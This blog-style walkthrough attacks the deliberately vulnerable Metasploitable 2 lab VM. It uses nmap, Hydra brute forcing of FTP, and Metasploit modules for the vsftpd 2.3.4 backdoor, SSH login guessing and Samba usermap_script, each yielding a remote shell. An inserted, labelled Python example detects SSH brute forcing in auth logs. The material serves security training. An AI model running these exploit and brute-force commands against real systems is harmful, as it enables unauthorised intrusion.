Hacking Metasploitable 2 ~ Vulnhub

Pritam Kumar Mukhopadhyay
Aug 5, 2021

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The default login and password is msfadmin:msfadmin. Never expose this VM to an untrusted network (use NAT or Host-only mode if you have any questions what that means).

In my case, the Metasploitable 2 IP is 192.168.1.6.

Network Scan

The first step is a service scan that looks at all 65535 ports of Metasploitable 2 to see what’s running where and with what version. You will notice the result in the image below.

nmap -Pn -sV -p- 192.168.1.6

Exploiting Port 21: FTP

We have all our ports and services listed now, so let’s start by exploiting port 21, which is running FTP. We will be using Hydra for this. The two wordlists for this operation will have default login names and passwords.

Hydra shows us that we have 3 valid login IDs and passwords.

hydra -L user.txt -P pass.txt 192.168.1.6 ftp

Let’s put our findings to use and try to connect using FTP.

ftp 192.168.1.6

We get the FTP login.

Exploiting VSFTPD 2.3.4

We have exploited the service running on port 21; now we will exploit the particular version of the FTP service. We will be searching for an exploit for VSFTPD 2.3.4.

msf > search vsftpd

We now have our exploit, let’s get into Metasploit and run it.

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th, 2011 and July 1st, 2011 according to the most recent information available. This backdoor was removed on July 3rd, 2011.

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit (unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.1.6

msf exploit (unix/ftp/vsftpd_234_backdoor) > exploit

Now use the default Linux commands to take advantage of the machine. As you can observe, we have owned the command shell of the remote machine.

Exploiting Port 22 SSH

Metasploit has an auxiliary function that we will use on the SSH service running on port 22. Once we get our session through it, we will be upgrading it to Meterpreter.

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary (scanner/ssh/ssh_login) > show options

msf auxiliary (scanner/ssh/ssh_login) > set RHOSTS 192.168.1.6

msf auxiliary (scanner/ssh/ssh_login) > set USER_FILE /root/Desktop/users.txt

msf auxiliary (scanner/ssh/ssh_login) > set PASS_FILE /root/Desktop/password.txt

msf auxiliary (scanner/ssh/ssh_login) > exploit

And as you can observe, again we have owned the command shell of the remote machine.
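Seen from the target's side, a list-driven login run like the one above leaves a recognizable trail in the SSH server's authentication log. The following added example, which is not part of the original post, flags sources with many failed logins across several usernames and reports any account that then logged in successfully; the log lines, thresholds and function name are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in OpenSSH auth.log format; addresses and users are
# illustrative (192.168.1.5 stands in for the scanning host).
SAMPLE_LOG = """\
Aug  5 10:00:01 metasploitable sshd[4101]: Failed password for invalid user admin from 192.168.1.5 port 40112 ssh2
Aug  5 10:00:02 metasploitable sshd[4103]: Failed password for root from 192.168.1.5 port 40114 ssh2
Aug  5 10:00:02 metasploitable sshd[4105]: Failed password for user from 192.168.1.5 port 40116 ssh2
Aug  5 10:00:03 metasploitable sshd[4107]: Failed password for msfadmin from 192.168.1.5 port 40118 ssh2
Aug  5 10:00:03 metasploitable sshd[4109]: Failed password for postgres from 192.168.1.5 port 40120 ssh2
Aug  5 10:00:04 metasploitable sshd[4111]: Failed password for service from 192.168.1.5 port 40122 ssh2
Aug  5 10:00:05 metasploitable sshd[4113]: Accepted password for msfadmin from 192.168.1.5 port 40124 ssh2
Aug  5 10:07:40 metasploitable sshd[4200]: Failed password for msfadmin from 192.168.1.20 port 51500 ssh2
Aug  5 10:07:52 metasploitable sshd[4202]: Accepted password for msfadmin from 192.168.1.20 port 51502 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def detect_guessing(log_text, min_failures=5, min_users=3):
    """Flag sources whose failures look like wordlist guessing (hypothetical helper)."""
    failed = defaultdict(list)       # src -> usernames of failed attempts
    compromised = defaultdict(list)  # src -> users accepted after heavy failure
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if m is None:
            continue
        src, user = m["src"], m["user"]
        if m["result"] == "Failed":
            failed[src].append(user)
        elif len(failed.get(src, [])) >= min_failures:
            # A success right after a burst of failures is the high-priority signal.
            compromised[src].append(user)
    findings = []
    for src, users in failed.items():
        # One user mistyping a password fails once or twice on one name;
        # a wordlist run fails many times across many names.
        if len(users) >= min_failures and len(set(users)) >= min_users:
            findings.append({"src": src, "failures": len(users),
                             "usernames_tried": len(set(users)),
                             "compromised": compromised.get(src, [])})
    return findings

if __name__ == "__main__":
    for finding in detect_guessing(SAMPLE_LOG):
        print(finding)
```

A non-empty `compromised` list means the account's password was guessed and should be rotated; the single mistyped login from 192.168.1.20 stays below both thresholds and is not reported.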

Exploiting Port 139 & 445 (Samba)

Samba is running on both port 139 and 445; we will be exploiting it using Metasploit. The default port for this exploit is set to port 139, but it can be changed to port 445 as well.

msf > use exploit/multi/samba/usermap_script

msf exploit (multi/samba/usermap_script) > set rhost 192.168.1.6

msf exploit (multi/samba/usermap_script) > exploit
